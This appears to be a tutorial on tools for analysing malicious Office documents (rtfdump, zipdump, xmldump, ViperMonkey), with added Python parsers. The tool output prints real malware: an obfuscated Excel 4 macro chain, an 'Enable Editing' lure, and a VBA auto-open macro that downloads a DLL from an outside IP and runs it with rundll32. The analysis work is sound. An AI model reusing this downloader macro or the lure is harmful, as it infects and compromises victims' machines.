00000280: 20 22 22 20 2B 20 22 34 22 0D 0A 0D 0A 46 75 6E "" + "4"....Fun
00000290: 63 74 69 6F 6E 20 61 67 65 36 34 50 72 6F 63 6F ction age64Proco
000002A0: 64 65 28 42 79 56 61 6C 20 63 76 77 74 72 35 79 de(ByVal cvwtr5y
000002B0: 63 62 76 65 2C 20 42 79 56 61 6C 20 74 72 74 73 cbve, ByVal trts
000002C0: 6B 34 38 34 74 33 37 38 29 0D 0A 20 20 20 20 44 k484t378).. D
000002D0: 69 6D 20 78 74 65 78 65 6E 63 0D 0A 20 20 20 20 im xtexenc..
(remainder omitted)
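As an added example, not part of the post or of rtfdump.py/rtfobj, here is a small Python parser for the header that the -H dump above begins with: an OLE 1.0 ObjectHeader (OLEVersion, FormatID, ClassName, TopicName, ItemName, NativeDataSize, as laid out in MS-OLEDS) followed by the Package body that carries the dropped file's name, source path and temp path, which is exactly what rtfobj printed for this object. The input is the first 144 bytes re-typed from the dump; the Package field names are mine, and the parser clamps the payload to what the buffer holds rather than trusting the declared size, which in this sample is larger than NativeDataSize.

```python
import struct
from dataclasses import dataclass

# First 0x90 bytes of the `rtfdump.py -s 7 -H sample.doc` output shown above,
# re-typed from the hex dump (the rest of the object is not on this page).
PACKAGE_HEX = (
    "0105000002000000080000007061636B"
    "616765000000000000000000653D0000"
    "02006162647466686759676567684470"
    "8D2E73635400433A5C6E736473546767"
    "485C6162647466686759676567684470"
    "8D2E736354000000030020000000433A"
    "5C43656B65706144875C616264746668"
    "67596765676844708D2E736354009E78"
    "00000D0A3C7363726970746C65540D0A"
)


@dataclass
class OlePackage:
    class_name: str      # ClassName from the OLE 1.0 ObjectHeader ("package")
    native_size: int     # NativeDataSize: bytes of Package body the container claims
    filename: str        # name the dropped file gets
    src_path: str        # path on the author's machine
    temp_path: str       # path Office writes the file to when it is activated
    declared_size: int   # payload size the Package body claims
    data: bytes          # payload bytes actually present, clamped to the buffer


def _cstr(buf: bytes, off: int):
    """Read a NUL-terminated byte string at off; return (text, offset after NUL)."""
    end = buf.index(b"\x00", off)
    return buf[off:end].decode("latin-1"), end + 1


def parse_ole_package(buf: bytes) -> OlePackage:
    # MS-OLEDS ObjectHeader: OLEVersion, FormatID, then three length-prefixed
    # ANSI strings (ClassName, TopicName, ItemName); FormatID 2 = embedded.
    version, format_id, class_len = struct.unpack_from("<III", buf, 0)
    if version != 0x00000501 or format_id != 2:
        raise ValueError("not an embedded OLE 1.0 object")
    off = 12
    class_name = buf[off:off + class_len].rstrip(b"\x00").decode("latin-1")
    off += class_len
    for _ in ("TopicName", "ItemName"):
        length, = struct.unpack_from("<I", buf, off)
        off += 4 + length
    native_size, = struct.unpack_from("<I", buf, off)
    off += 4
    if class_name.lower() != "package":
        raise ValueError(f"class {class_name!r} is not an OLE Package")
    # Package body, in the order rtfobj reports it (field names are mine):
    # u16 (2 in samples seen), filename, source path, u32 unknown,
    # u32 temp-path length, temp path, u32 payload size, payload.
    off += 2
    filename, off = _cstr(buf, off)
    src_path, off = _cstr(buf, off)
    off += 4
    temp_len, = struct.unpack_from("<I", buf, off)
    off += 4
    temp_path = buf[off:off + temp_len].rstrip(b"\x00").decode("latin-1")
    off += temp_len
    declared_size, = struct.unpack_from("<I", buf, off)
    off += 4
    # Never trust the declared size: slicing clamps to what the buffer holds.
    data = buf[off:off + declared_size]
    return OlePackage(class_name, native_size, filename, src_path, temp_path,
                      declared_size, data)


def size_consistent(pkg: OlePackage) -> bool:
    """False when the body claims more payload than NativeDataSize allows."""
    return pkg.declared_size <= pkg.native_size


if __name__ == "__main__":
    pkg = parse_ole_package(bytes.fromhex(PACKAGE_HEX))
    print(f"drops {pkg.filename!r} via {pkg.temp_path!r} "
          f"(declared {pkg.declared_size} bytes, native {pkg.native_size}, "
          f"consistent={size_consistent(pkg)})")
```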
Adding "-d" extracts just the strings.
C:\Users\masaomi\Documents\DidierStevensSuite>rtfdump.py -s 3 -d sample.doc
\fcs1 \af31507 \ltrch\fcs0 \insrsid4932593
Microsoft Office does not work in email Preview.\line Please download the document and click {\b Enable Editing} when opening.
zipdump.py
A tool for analyzing ZIP files, but it can also be used to analyze Office files.
Its options are similar to those of oledump.py.
C:\Users\masaomi\Downloads\DidierStevensSuite>zipdump.py sample.xlsm
Index Filename Encrypted Timestamp
1 [Content_Types].xml 0 1980-01-01 00:00:00
2 _rels/.rels 0 1980-01-01 00:00:00
3 xl/workbook.xml 0 1980-01-01 00:00:00
4 xl/_rels/workbook.xml.rels 0 1980-01-01 00:00:00
5 xl/worksheets/sheet1.xml 0 1980-01-01 00:00:00
6 xl/worksheets/sheet2.xml 0 1980-01-01 00:00:00
7 xl/worksheets/sheet3.xml 0 1980-01-01 00:00:00
8 xl/worksheets/sheet4.xml 0 1980-01-01 00:00:00
9 xl/macrosheets/intlsheet1.xml 0 1980-01-01 00:00:00
10 xl/theme/theme1.xml 0 1980-01-01 00:00:00
11 xl/styles.xml 0 1980-01-01 00:00:00
12 xl/sharedStrings.xml 0 1980-01-01 00:00:00
13 xl/drawings/drawing1.xml 0 1980-01-01 00:00:00
14 xl/media/image1.png 0 1980-01-01 00:00:00
15 xl/worksheets/_rels/sheet1.xml.rels 0 1980-01-01 00:00:00
16 xl/drawings/_rels/drawing1.xml.rels 0 1980-01-01 00:00:00
17 xl/calcChain.xml 0 1980-01-01 00:00:00
18 docProps/core.xml 0 1980-01-01 00:00:00
19 docProps/app.xml 0 1980-01-01 00:00:00
Adding "-d" shows the contents.
C:\Users\masaomi\Downloads\DidierStevensSuite>zipdump.py -s 9 -d sample.xlsm
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<xm:macrosheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:xm="http://schemas.microsoft.com/office/excel/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" mc:Ignorable="x14ac xr xr2 xr3 xr6" xmlns:x14ac="http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" xmlns:xr2="http://schemas.microsoft.com/office/spreadsheetml/2015/revision2" xmlns:xr3="http://schemas.microsoft.com/office/spreadsheetml/2016/revision3" xmlns:xr6="http://schemas.microsoft.com/office/spreadsheetml/2016/revision6" xr6:uid="{A0124FFD-D8B1-4C57-9FC3-DE9478087DFA}"><dimension ref="G8"/><sheetViews><sheetView showFormulas="1" workbookViewId="0"><selection activeCell="B4" sqref="B4"/></sheetView></sheetViews><sheetFormatPr defaultRowHeight="15" x14ac:dyDescent="0.25"/><cols><col min="7" max="7" width="255.7109375" bestFit="1" customWidth="1"/></cols><sheetData><row r="8" spans="7:7" x14ac:dyDescent="0.25"><c r="G8" t="b"><f>FORMULA(Cdfea!P22&Cdfea!H9&Cdfea!L2&Cdfea!B15&Cdfea!B15&Tgbs!D7&Tgbs!F3&Cdfea!F10&Tgbs!I10&Cdfea!H4&Cdfea!L2&Tgbs!Q9&Tgbfgs!J17&Tgbs!F14&Tgbfgs!S15&Tgbfgs!F16,G13)=FORMULA(Cdfea!P22&Cdfea!J11&Cdfea!B18&Cdfea!P11&"NEVR1"&Tgbfgs!Q5&Cdfea!H9&Cdfea!L2&Cdfea!B15&Cdfea!B15&Tgbs!D7&Tgbs!F3&Cdfea!F10&Tgbs!I10&Cdfea!H4&Cdfea!L2&Tgbs!Q9&Tgbfgs!J17&Tgbs!G16&Tgbfgs!S15&Tgbfgs!F16&Cdfea!P13,G15)=FORMULA(Cdfea!P22&Cdfea!J11&Cdfea!B18&Cdfea!P11&"NEVR2"&Tgbfgs!Q5&Cdfea!H9&Cdfea!L2&Cdfea!B15&Cdfea!B15&Tgbs!D7&Tgbs!F3&Cdfea!F10&Tgbs!I10&Cdfea!H4&Cdfea!L2&Tgbs!Q9&Tgbfgs!J17&Tgbs!H14&Tgbfgs!S15&Tgbfgs!F16&Cdfea!P13,G17)=FORMULA(Cdfea!P22&Cdfea!J11&Cdfea!B18&Cdfea!P11&"NEVR3"&Tgbfgs!Q5&Cdfea!H9&Cdfea!L2&Cdfea!B15&Cdfea!B15&Tgbs!D7&Tgbs!F3&Cdfea!F10&Tgbs!I10&Cdfea!H4&Cdfea!L2&Tgbs!Q9&Tgbfgs!J17&Tgbs!I16&Tgbfgs!S15&Tgbfgs!F16&Cdfea!P13,G19)=FORMULA(Cdfea!P22&Cdfea!J11&Cdfea!B18&Cdfea!P11&"NEVR4"&Tgbfgs!Q5&Cdfea!H9&Cdfea!L2&Cdfea!B15&Cdfea!B15&Tgbs!D7&Tgbs!F3&Cdfea!F10&Tgbs!I10&Cdfea!H4&Cdfea!L2&Tgbs!Q9&Tgbfgs!J17&Tgbs!J14&Tgbfgs!S15&Tgbfgs!F16&Cdfea!P13,G21)=FORMULA(Cdfea!P22&Cdfea!J11&Cdfea!B18&Cdfea!P11&"NEVR5"&Tgbfgs!Q5&Cdfea!H9&Cdfea!L2&Cdfea!B15&Cdfea!B15&Tgbs!D7&Tgbs!F3&Cdfea!F10&Tgbs!I10&Cdfea!H4&Cdfea!L2&Tgbs!Q9&Tgbfgs!J17&Tgbs!K16&Tgbfgs!S15&Tgbfgs!F16&Cdfea!P13,G23)=FORMULA(Cdfea!P22&Cdfea!J11&Cdfea!B18&Cdfea!P11&"NEVR6"&Tgbfgs!Q5&Cdfea!H9&Cdfea!L2&Cdfea!B15&Cdfea!B15&Tgbs!D7&Tgbs!F3&Cdfea!F10&Tgbs!I10&Cdfea!H4&Cdfea!L2&Tgbs!Q9&Tgbfgs!J17&Tgbs!L14&Tgbfgs!S15&Tgbfgs!F16&Cdfea!P13,G25)=FORMULA(Cdfea!P22&Cdfea!J11&Cdfea!B18&Cdfea!P11&"NEVR7"&Tgbfgs!Q5&Cdfea!H9&Cdfea!B15&Cdfea!I17&Cdfea!I3&Cdfea!H13&Cdfea!P11&Cdfea!K9&Cdfea!P13&Cdfea!P7&Cdfea!P13,G27)=FORMULA(Cdfea!P22&Cdfea!H13&Cdfea!N4&Cdfea!H13&Cdfea!H9&Cdfea!P11&Cdfea!P15&Cdfea!H9&Cdfea!P20&Tgbfgs!M12&Tgbfgs!N8&Tgbfgs!I4&Tgbs!R21&Tgbfgs!G10&Cdfea!P15&Cdfea!P13,G29)=FORMULA(Cdfea!P22&Cdfea!G24&Cdfea!H13&Cdfea!E6&Cdfea!E11&Cdfea!G24&Cdfea!K23&Cdfea!P11&Cdfea!P13,G34)</f><v>1</v></c></row></sheetData><pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" header="0.3" footer="0.3"/></xm:macrosheet>
Adding "-t utf8" or "-t utf16" decodes the content.
xmldump.py
Analyzes the XML files contained in Office files.
With "text", it extracts all the strings from the elements in the XML.
C:\Users\masaomi\Downloads\DidierStevensSuite>zipdump.py -s 9 -d sample.xlsm | xmldump.py text
FORMULA(Cdfea!P22&Cdfea!H9&Cdfea!L2&Cdfea!B15&Cdfea!B15&Tgbs!D7&Tgbs!F3&Cdfea!F10&Tgbs!I10&Cdfea!H4&Cdfea!L2&Tgbs!Q9&Tgbfgs!J17&Tgbs!F14&Tgbfgs!S15&Tgbfgs!F16,G13)=FORMULA(Cdfea!P22&Cdfea!J11&Cdfea!B18&Cdfea!P11&"NEVR1"&Tgbfgs!Q5&Cdfea!H9&Cdfea!L2&Cdfea!B15&Cdfea!B15&Tgbs!D7&Tgbs!F3&Cdfea!F10&Tgbs!I10&Cdfea!H4&Cdfea!L2&Tgbs!Q9&Tgbfgs!J17&Tgbs!G16&Tgbfgs!S15&Tgbfgs!F16&Cdfea!P13,G15)=FORMULA(Cdfea!P22&Cdfea!J11&Cdfea!B18&Cdfea!P11&"NEVR2"&Tgbfgs!Q5&Cdfea!H9&Cdfea!L2&Cdfea!B15&Cdfea!B15&Tgbs!D7&Tgbs!F3&Cdfea!F10&Tgbs!I10&Cdfea!H4&Cdfea!L2&Tgbs!Q9&Tgbfgs!J17&Tgbs!H14&Tgbfgs!S15&Tgbfgs!F16&Cdfea!P13,G17)=FORMULA(Cdfea!P22&Cdfea!J11&Cdfea!B18&Cdfea!P11&"NEVR3"&Tgbfgs!Q5&Cdfea!H9&Cdfea!L2&Cdfea!B15&Cdfea!B15&Tgbs!D7&Tgbs!F3&Cdfea!F10&Tgbs!I10&Cdfea!H4&Cdfea!L2&Tgbs!Q9&Tgbfgs!J17&Tgbs!I16&Tgbfgs!S15&Tgbfgs!F16&Cdfea!P13,G19)=FORMULA(Cdfea!P22&Cdfea!J11&Cdfea!B18&Cdfea!P11&"NEVR4"&Tgbfgs!Q5&Cdfea!H9&Cdfea!L2&Cdfea!B15&Cdfea!B15&Tgbs!D7&Tgbs!F3&Cdfea!F10&Tgbs!I10&Cdfea!H4&Cdfea!L2&Tgbs!Q9&Tgbfgs!J17&Tgbs!J14&Tgbfgs!S15&Tgbfgs!F16&Cdfea!P13,G21)=FORMULA(Cdfea!P22&Cdfea!J11&Cdfea!B18&Cdfea!P11&"NEVR5"&Tgbfgs!Q5&Cdfea!H9&Cdfea!L2&Cdfea!B15&Cdfea!B15&Tgbs!D7&Tgbs!F3&Cdfea!F10&Tgbs!I10&Cdfea!H4&Cdfea!L2&Tgbs!Q9&Tgbfgs!J17&Tgbs!K16&Tgbfgs!S15&Tgbfgs!F16&Cdfea!P13,G23)=FORMULA(Cdfea!P22&Cdfea!J11&Cdfea!B18&Cdfea!P11&"NEVR6"&Tgbfgs!Q5&Cdfea!H9&Cdfea!L2&Cdfea!B15&Cdfea!B15&Tgbs!D7&Tgbs!F3&Cdfea!F10&Tgbs!I10&Cdfea!H4&Cdfea!L2&Tgbs!Q9&Tgbfgs!J17&Tgbs!L14&Tgbfgs!S15&Tgbfgs!F16&Cdfea!P13,G25)=FORMULA(Cdfea!P22&Cdfea!J11&Cdfea!B18&Cdfea!P11&"NEVR7"&Tgbfgs!Q5&Cdfea!H9&Cdfea!B15&Cdfea!I17&Cdfea!I3&Cdfea!H13&Cdfea!P11&Cdfea!K9&Cdfea!P13&Cdfea!P7&Cdfea!P13,G27)=FORMULA(Cdfea!P22&Cdfea!H13&Cdfea!N4&Cdfea!H13&Cdfea!H9&Cdfea!P11&Cdfea!P15&Cdfea!H9&Cdfea!P20&Tgbfgs!M12&Tgbfgs!N8&Tgbfgs!I4&Tgbs!R21&Tgbfgs!G10&Cdfea!P15&Cdfea!P13,G29)=FORMULA(Cdfea!P22&Cdfea!G24&Cdfea!H13&Cdfea!E6&Cdfea!E11&Cdfea!G24&Cdfea!K23&Cdfea!P11&Cdfea!P13,G34)1
With "wordtext", it displays the strings of the w:p elements.
With "elementtext", it displays every element in the XML file together with its string.
C:\Users\masaomi\Downloads\DidierStevensSuite>zipdump.py -s 9 -d sample.xlsm | xmldump.py elementtext
xm:macrosheet: FORMULA(Cdfea!P22&Cdfea!H9&Cdfea!L2&Cdfea!B15&Cdfea!B15&Tgbs!D7&Tgbs!F3&Cdfea!F10&Tgbs!I10&Cdfea!H4&Cdfea!L2&Tgbs!Q9&Tgbfgs!J17&Tgbs!F14&Tgbfgs!S15&Tgbfgs!F16,G13)=FORMULA(Cdfea!P22&Cdfea!J11&Cdfea!B18&Cdfea!P11&"NEVR1"&Tgbfgs!Q5&Cdfea!H9&Cdfea!L2&Cdfea!B15&Cdfea!B15&Tgbs!D7&Tgbs!F3&Cdfea!F10&Tgbs!I10&Cdfea!H4&Cdfea!L2&Tgbs!Q9&Tgbfgs!J17&Tgbs!G16&Tgbfgs!S15&Tgbfgs!F16&Cdfea!P13,G15)=FORMULA(Cdfea!P22&Cdfea!J11&Cdfea!B18&Cdfea!P11&"NEVR2"&Tgbfgs!Q5&Cdfea!H9&Cdfea!L2&Cdfea!B15&Cdfea!B15&Tgbs!D7&Tgbs!F3&Cdfea!F10&Tgbs!I10&Cdfea!H4&Cdfea!L2&Tgbs!Q9&Tgbfgs!J17&Tgbs!H14&Tgbfgs!S15&Tgbfgs!F16&Cdfea!P13,G17)=FORMULA(Cdfea!P22&Cdfea!J11&Cdfea!B18&Cdfea!P11&"NEVR3"&Tgbfgs!Q5&Cdfea!H9&Cdfea!L2&Cdfea!B15&Cdfea!B15&Tgbs!D7&Tgbs!F3&Cdfea!F10&Tgbs!I10&Cdfea!H4&Cdfea!L2&Tgbs!Q9&Tgbfgs!J17&Tgbs!I16&Tgbfgs!S15&Tgbfgs!F16&Cdfea!P13,G19)=FORMULA(Cdfea!P22&Cdfea!J11&Cdfea!B18&Cdfea!P11&"NEVR4"&Tgbfgs!Q5&Cdfea!H9&Cdfea!L2&Cdfea!B15&Cdfea!B15&Tgbs!D7&Tgbs!F3&Cdfea!F10&Tgbs!I10&Cdfea!H4&Cdfea!L2&Tgbs!Q9&Tgbfgs!J17&Tgbs!J14&Tgbfgs!S15&Tgbfgs!F16&Cdfea!P13,G21)=FORMULA(Cdfea!P22&Cdfea!J11&Cdfea!B18&Cdfea!P11&"NEVR5"&Tgbfgs!Q5&Cdfea!H9&Cdfea!L2&Cdfea!B15&Cdfea!B15&Tgbs!D7&Tgbs!F3&Cdfea!F10&Tgbs!I10&Cdfea!H4&Cdfea!L2&Tgbs!Q9&Tgbfgs!J17&Tgbs!K16&Tgbfgs!S15&Tgbfgs!F16&Cdfea!P13,G23)=FORMULA(Cdfea!P22&Cdfea!J11&Cdfea!B18&Cdfea!P11&"NEVR6"&Tgbfgs!Q5&Cdfea!H9&Cdfea!L2&Cdfea!B15&Cdfea!B15&Tgbs!D7&Tgbs!F3&Cdfea!F10&Tgbs!I10&Cdfea!H4&Cdfea!L2&Tgbs!Q9&Tgbfgs!J17&Tgbs!L14&Tgbfgs!S15&Tgbfgs!F16&Cdfea!P13,G25)=FORMULA(Cdfea!P22&Cdfea!J11&Cdfea!B18&Cdfea!P11&"NEVR7"&Tgbfgs!Q5&Cdfea!H9&Cdfea!B15&Cdfea!I17&Cdfea!I3&Cdfea!H13&Cdfea!P11&Cdfea!K9&Cdfea!P13&Cdfea!P7&Cdfea!P13,G27)=FORMULA(Cdfea!P22&Cdfea!H13&Cdfea!N4&Cdfea!H13&Cdfea!H9&Cdfea!P11&Cdfea!P15&Cdfea!H9&Cdfea!P20&Tgbfgs!M12&Tgbfgs!N8&Tgbfgs!I4&Tgbs!R21&Tgbfgs!G10&Cdfea!P15&Cdfea!P13,G29)=FORMULA(Cdfea!P22&Cdfea!G24&Cdfea!H13&Cdfea!E6&Cdfea!E11&Cdfea!G24&Cdfea!K23&Cdfea!P11&Cdfea!P13,G34)1
dimension:
sheetViews:
sheetView:
selection:
sheetFormatPr:
cols:
col:
(remainder omitted)
Adding "-u" includes the URL strings (the element namespace URIs) in the output.
C:\Users\masaomi\Downloads\DidierStevensSuite>zipdump.py -s 9 -d sample.xlsm | x
mldump.py -u elementtext
{http://schemas.microsoft.com/office/excel/2006/main}macrosheet: FORMULA(Cdfea!P
22&Cdfea!H9&Cdfea!L2&Cdfea!B15&Cdfea!B15&Tgbs!D7&Tgbs!F3&Cdfea!F10&Tgbs!I10&Cdfe
a!H4&Cdfea!L2&Tgbs!Q9&Tgbfgs!J17&Tgbs!F14&Tgbfgs!S15&Tgbfgs!F16,G13)=FORMULA(Cdf
ea!P22&Cdfea!J11&Cdfea!B18&Cdfea!P11&"NEVR1"&Tgbfgs!Q5&Cdfea!H9&Cdfea!L2&Cdfea!B
15&Cdfea!B15&Tgbs!D7&Tgbs!F3&Cdfea!F10&Tgbs!I10&Cdfea!H4&Cdfea!L2&Tgbs!Q9&Tgbfgs
!J17&Tgbs!G16&Tgbfgs!S15&Tgbfgs!F16&Cdfea!P13,G15)=FORMULA(Cdfea!P22&Cdfea!J11&C
dfea!B18&Cdfea!P11&"NEVR2"&Tgbfgs!Q5&Cdfea!H9&Cdfea!L2&Cdfea!B15&Cdfea!B15&Tgbs!
D7&Tgbs!F3&Cdfea!F10&Tgbs!I10&Cdfea!H4&Cdfea!L2&Tgbs!Q9&Tgbfgs!J17&Tgbs!H14&Tgbf
gs!S15&Tgbfgs!F16&Cdfea!P13,G17)=FORMULA(Cdfea!P22&Cdfea!J11&Cdfea!B18&Cdfea!P11
&"NEVR3"&Tgbfgs!Q5&Cdfea!H9&Cdfea!L2&Cdfea!B15&Cdfea!B15&Tgbs!D7&Tgbs!F3&Cdfea!F
10&Tgbs!I10&Cdfea!H4&Cdfea!L2&Tgbs!Q9&Tgbfgs!J17&Tgbs!I16&Tgbfgs!S15&Tgbfgs!F16&
Cdfea!P13,G19)=FORMULA(Cdfea!P22&Cdfea!J11&Cdfea!B18&Cdfea!P11&"NEVR4"&Tgbfgs!Q5
&Cdfea!H9&Cdfea!L2&Cdfea!B15&Cdfea!B15&Tgbs!D7&Tgbs!F3&Cdfea!F10&Tgbs!I10&Cdfea!
H4&Cdfea!L2&Tgbs!Q9&Tgbfgs!J17&Tgbs!J14&Tgbfgs!S15&Tgbfgs!F16&Cdfea!P13,G21)=FOR
MULA(Cdfea!P22&Cdfea!J11&Cdfea!B18&Cdfea!P11&"NEVR5"&Tgbfgs!Q5&Cdfea!H9&Cdfea!L2
&Cdfea!B15&Cdfea!B15&Tgbs!D7&Tgbs!F3&Cdfea!F10&Tgbs!I10&Cdfea!H4&Cdfea!L2&Tgbs!Q
9&Tgbfgs!J17&Tgbs!K16&Tgbfgs!S15&Tgbfgs!F16&Cdfea!P13,G23)=FORMULA(Cdfea!P22&Cdf
ea!J11&Cdfea!B18&Cdfea!P11&"NEVR6"&Tgbfgs!Q5&Cdfea!H9&Cdfea!L2&Cdfea!B15&Cdfea!B
15&Tgbs!D7&Tgbs!F3&Cdfea!F10&Tgbs!I10&Cdfea!H4&Cdfea!L2&Tgbs!Q9&Tgbfgs!J17&Tgbs!
L14&Tgbfgs!S15&Tgbfgs!F16&Cdfea!P13,G25)=FORMULA(Cdfea!P22&Cdfea!J11&Cdfea!B18&C
dfea!P11&"NEVR7"&Tgbfgs!Q5&Cdfea!H9&Cdfea!B15&Cdfea!I17&Cdfea!I3&Cdfea!H13&Cdfea
!P11&Cdfea!K9&Cdfea!P13&Cdfea!P7&Cdfea!P13,G27)=FORMULA(Cdfea!P22&Cdfea!H13&Cdfe
a!N4&Cdfea!H13&Cdfea!H9&Cdfea!P11&Cdfea!P15&Cdfea!H9&Cdfea!P20&Tgbfgs!M12&Tgbfgs
!N8&Tgbfgs!I4&Tgbs!R21&Tgbfgs!G10&Cdfea!P15&Cdfea!P13,G29)=FORMULA(Cdfea!P22&Cdf
ea!G24&Cdfea!H13&Cdfea!E6&Cdfea!E11&Cdfea!G24&Cdfea!K23&Cdfea!P11&Cdfea!P13,G34)
1
(remainder omitted)
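To show what "elementtext" and "-u" are doing underneath, here is an added Python example (it is not part of the Didier Stevens Suite and not code from this post). It opens an .xlsm as a zip, lists each element of an XML part together with the text of its subtree, optionally prefixed with the namespace URI, and flags any part whose root element is an Excel 4 macrosheet. The .xlsm is constructed in memory with a single FORMULA cell; the member name xl/macrosheets/sheet1.xml and the SpreadsheetML namespace are assumptions about the file layout, and the macrosheet namespace is the one visible in the output above.

```python
"""Added example (not Didier Stevens Suite code): list the elements of an OOXML
part like xmldump.py's "elementtext" mode, with or without namespace URIs, and
flag Excel 4 (XLM) macro sheets inside an .xlsm."""
import io
import re
import zipfile
import xml.etree.ElementTree as ET

# Namespace of XLM macro sheets (seen in the -u output above) and the default
# SpreadsheetML namespace (assumption about the file layout).
XLM_NS = "http://schemas.microsoft.com/office/excel/2006/main"
SML_NS = "http://schemas.openxmlformats.org/spreadsheetml/2006/main"
CT_NS = "http://schemas.openxmlformats.org/package/2006/content-types"


def build_sample_xlsm() -> bytes:
    """Constructed minimal .xlsm-like zip with one XLM macro sheet (demo input)."""
    macrosheet = (
        '<?xml version="1.0" encoding="UTF-8"?>'
        f'<xm:macrosheet xmlns:xm="{XLM_NS}" xmlns="{SML_NS}">'
        '<dimension ref="A1:G3"/>'
        '<sheetData><row r="1"><c r="G13">'
        '<f>FORMULA(Cdfea!P22&amp;Cdfea!H9,G15)</f>'
        '</c></row></sheetData>'
        '</xm:macrosheet>'
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("[Content_Types].xml", f'<Types xmlns="{CT_NS}"/>')
        z.writestr("xl/macrosheets/sheet1.xml", macrosheet)
    return buf.getvalue()


def split_tag(tag: str):
    """ElementTree stores tags as '{uri}local'; return (uri, local)."""
    m = re.match(r"\{(.*)\}(.*)", tag)
    return (m.group(1), m.group(2)) if m else ("", tag)


def element_text(xml_bytes: bytes, show_ns: bool = False):
    """[(name, text)] for every element, text being the joined subtree text.
    With show_ns the name carries the namespace URI, as xmldump.py -u does."""
    out = []
    for el in ET.fromstring(xml_bytes).iter():
        ns, local = split_tag(el.tag)
        name = f"{{{ns}}}{local}" if show_ns and ns else local
        out.append((name, "".join(el.itertext()).strip()))
    return out


def elements_of(xlsm_bytes: bytes, member: str, show_ns: bool = False):
    """element_text() for one zip member of the workbook."""
    with zipfile.ZipFile(io.BytesIO(xlsm_bytes)) as z:
        return element_text(z.read(member), show_ns)


def find_macrosheets(xlsm_bytes: bytes):
    """Zip members whose root element is an XLM macrosheet (a red flag on its own)."""
    hits = []
    with zipfile.ZipFile(io.BytesIO(xlsm_bytes)) as z:
        for name in z.namelist():
            if not name.endswith(".xml"):
                continue
            try:
                root = ET.fromstring(z.read(name))
            except ET.ParseError:
                continue  # not XML, or damaged: skip rather than crash
            if split_tag(root.tag) == (XLM_NS, "macrosheet"):
                hits.append(name)
    return hits


if __name__ == "__main__":
    sample = build_sample_xlsm()
    for member in find_macrosheets(sample):
        print("XLM macro sheet:", member)
        for name, text in elements_of(sample, member, show_ns=True):
            print(f"  {name}: {text}")
```

Point find_macrosheets at a real workbook's bytes to use it on a sample; a non-empty result means the file carries Excel 4 macro sheets even when oleid reports no VBA.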
ViperMonkey
A tool that performs dynamic analysis (emulation) of malicious VBA macros.
It can be run in Docker: running the command below is all it takes to start the analysis.
The sample is copied into the container and analyzed there.
$ docker/dockermonkey.sh sample.xls
_ ___ __ ___ __
| | / (_)___ ___ _____/ |/ /___ ____ / /_____ __ __
| | / / / __ \/ _ \/ ___/ /|_/ / __ \/ __ \/ //_/ _ \/ / / /
| |/ / / /_/ / __/ / / / / / /_/ / / / / ,< / __/ /_/ /
|___/_/ .___/\___/_/ /_/ /_/\____/_/ /_/_/|_|\___/\__, /
/_/ /____/
vmonkey 1.0.2 - https://github.com/decalage2/ViperMonkey
THIS IS WORK IN PROGRESS - Check updates regularly!
Please report any issue at https://github.com/decalage2/ViperMonkey/issues
===============================================================================
FILE: /root/sample.xls
-------------------------------------------------------------------------------
VBA MACRO ЭтаКнига.cls
in file: - OLE stream: u'_VBA_PROJECT_CUR/VBA/\u042d\u0442\u0430\u041a\u043d\u0438\u0433\u0430'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
-------------------------------------------------------------------------------
VBA CODE (with long lines collapsed):
Sub Workbook_Open()
Dim euvjhxge As Object
Dim tnukmirrugnryiyq As Object
Dim tdcivbfshcvnxzndtlc As String
Dim frwygfpnfwpcuyrbrni As String
tdcivbfshcvnxzndtlc = fmlnjifrotgwtih("687474703a2f2f36362e3135302e36362e3136372f73752e") & fmlnjifrotgwtih("646c6c")
frwygfpnfwpcuyrbrni = fmlnjifrotgwtih("433a5c5769") & fmlnjifrotgwtih("6e646f77735c5461736b735c73752e646c6c")
Set euvjhxge = CreateObject(fmlnjifrotgwtih("4d6963") & fmlnjifrotgwtih("726f736f66742e584d4c48545450"))
euvjhxge.Open fmlnjifrotgwtih("474554"), tdcivbfshcvnxzndtlc, False
euvjhxge.send
If euvjhxge.Status = 200 Then
Set tnukmirrugnryiyq = CreateObject(fmlnjifrotgwtih("41444f44422e") & fmlnjifrotgwtih("53747265616d"))
tnukmirrugnryiyq.Open
tnukmirrugnryiyq.Type = 1
tnukmirrugnryiyq.Write euvjhxge.responseBody
tnukmirrugnryiyq.SaveToFile frwygfpnfwpcuyrbrni, 2
tnukmirrugnryiyq.Close
End If
Dim ExecFile As Double
ExecFile = Shell(fmlnjifrotgwtih("72756e646c6c333220433a5c57696e646f77735c5461736b735c7375") & fmlnjifrotgwtih("2e646c6c2c20506c7567696e496e6974"))
End Sub
-------------------------------------------------------------------------------
PARSING VBA CODE:
-------------------------------------------------------------------------------
VBA MACRO Лист1.cls
in file: - OLE stream: u'_VBA_PROJECT_CUR/VBA/\u041b\u0438\u0441\u04421'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
(empty macro)
-------------------------------------------------------------------------------
VBA MACRO hdxlonvwk.bas
in file: - OLE stream: u'_VBA_PROJECT_CUR/VBA/hdxlonvwk'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
-------------------------------------------------------------------------------
VBA CODE (with long lines collapsed):
Function fmlnjifrotgwtih(ByVal erhzhqcay As String) As String
Dim pctzqqipfx As Long
For pctzqqipfx = 1 To Len(erhzhqcay) Step 2
fmlnjifrotgwtih = fmlnjifrotgwtih & Chr$(Val("&H" & Mid$(erhzhqcay, pctzqqipfx, 2)))
Next pctzqqipfx
End Function
-------------------------------------------------------------------------------
PARSING VBA CODE:
-------------------------------------------------------------------------------
TRACING VBA CODE (entrypoint = Auto*):
Recorded Actions:
+----------------------+-----------------------------------------------+---------------------------------+
| Action | Parameters | Description |
+----------------------+-----------------------------------------------+---------------------------------+
| Start Regular | | All wildcard matches will match |
| Emulation | | |
| Found Entry Point | workbook_open | |
| CreateObject | ['Microsoft.XMLHTTP'] | Interesting Function Call |
